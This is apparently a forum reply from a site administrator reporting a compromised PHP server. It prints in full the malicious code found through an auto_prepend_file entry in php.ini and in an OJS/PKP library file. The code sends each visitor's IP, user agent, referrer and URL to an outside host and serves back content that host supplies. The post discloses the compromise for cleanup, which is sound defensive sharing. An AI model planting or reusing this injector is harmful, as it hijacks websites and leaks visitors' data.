Dear all,
Thank you for your replies @henriquejsfj and @mpbraendle
@asmecher and @henriquejsfj, you are right.
There was an entry in my php.ini pointing to a file (php7) containing this content (indented):
<?php
try {
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
ini_set('display_errors', 'off');
error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);
if (@$_SERVER['HTTP_SEC_FETCH_SRC'] === "SPM") {
echo "SPM";
exit();
}
function postXUrl($url, $postData) {
if (function_exists('curl_version')) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERAGENT, 'kingpin');
curl_setopt($curl, CURLOPT_REFERER, @$_SERVER['HTTP_REFERER']);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $postData);
$response = curl_exec($curl);
curl_close($curl);
return $response;
} else {
$contextOptions = array(
'http' => array(
'method' => 'POST',
'header' => "User-Agent: kingpin\r\nContent-Type: application/x-www-form-urlencoded\r\n",
'content' => http_build_query($postData),
'timeout' => 10,
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
),
);
$context = stream_context_create($contextOptions);
$response = file_get_contents($url, false, $context);
return $response;
}
}
function getIP() {
$ip = '';
if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
$ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
} elseif (isset($_SERVER['HTTP_CDN_SRC_IP'])) {
$ip = $_SERVER['HTTP_CDN_SRC_IP'];
} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
$ip = $_SERVER['HTTP_X_FORWARDED'];
} elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_FORWARDED'])) {
$ip = $_SERVER['HTTP_FORWARDED'];
} elseif (isset($_SERVER['REMOTE_ADDR'])) {
$ip = $_SERVER['REMOTE_ADDR'];
} else {
$ip = 'UNKNOWN';
}
return $ip;
}
$url = ["https://eulaapiv3.checklicenses.com/v1.32/eula"];
$currentUri = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
$postData = array(
'h_type' => 0,
'f_uri' => $currentUri,
'lang' => 'br',
'r_path' => '/',
's_path' => '',
'g_ip' => getIP(),
'g_ua' => @$_SERVER['HTTP_USER_AGENT'],
'ref' => @$_SERVER['HTTP_REFERER'],
);
$response = postXUrl($url, $postData);
$responseDecoded = @json_decode($response);
if ($responseDecoded != null) {
if (!$responseDecoded->s) {
if ($responseDecoded->ct) {
header('Content-Type: ' . $responseDecoded->ct, true);
}
echo $responseDecoded->c;
exit();
}
}
}
} catch (Exception $e) {
// Handle exception if needed
}
?>
The php.ini entry:
auto_prepend_file = "/var/lib/php/php7"
Additionally, the same code was found in the lib/pkp/includes/functions.inc.php file.
I’m working to fix the problem in my PHP environment.
I am truly thnaks for all the comments.
Regards